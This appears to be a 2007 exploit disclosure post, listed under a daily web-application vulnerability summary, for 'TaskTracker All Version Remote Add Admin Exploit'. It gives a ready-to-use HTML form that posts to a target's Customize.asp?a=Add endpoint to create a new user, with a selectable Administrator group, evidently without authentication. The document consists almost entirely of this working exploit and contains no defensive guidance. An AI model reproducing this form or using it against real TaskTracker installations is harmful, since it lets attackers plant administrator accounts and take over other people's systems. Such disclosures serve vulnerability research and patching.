Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

newsCMSlite (newsCMS. mdb) Remote Password Disclosure Vulnerablity

WWWBoard 2.0 Alpha 2 (passwd.txt) Password Disclosure Vulnerability

autoDealer <= 2.0 (iPro) Remote SQL Injection Vulnerability

Vizayn Haber (tr) == (tr) SQL Injection Vulnerability

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	03.01.2007
Subject:	TaskTracker All Version Remote Add Admin Exploit

<!--

*******************************************************************************
# Title   :  TaskTracker All Version Remote Add Admin Exploit
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.geckovich.com
# $$      :  $39.99 - $19.99

*******************************************************************************

-->

<FORM NAME="AddUser" METHOD="POST" ACTION="http://[target]/[path]/Customize.asp?a=Add" style="word-spacing: 0; margin-top: 0; margin-bottom: 0">
<td valign=top class='data3'>
       <input type=text size="1" name="Name" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
</td>
<td valign=top class='data3'>
<input type=text size="1" name="Email" class=textboxes style='width:200; height:17; font-size: 10px;' VALUE="">
</td>
<td valign=top class='data3'>
<input type=text size="1" name="UserName" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">

</td>
<td valign=top class='data3'>
<input type=text size="1" name="Password" class=textboxes style='width:100; height:17; font-size: 10px;' VALUE="">
</td>
<td valign=top class='data3'>
<select name="GroupID" class="selectedtextboxes">
<option value="1">Publisher</option>
<option value="2">Editor</option>

<option value="3">Administrator</option>
</select>
</td>
<td valign=middle class='data3' align="center" colspan="2" align="center">
    <input type="submit" value="Gonder">
    </form>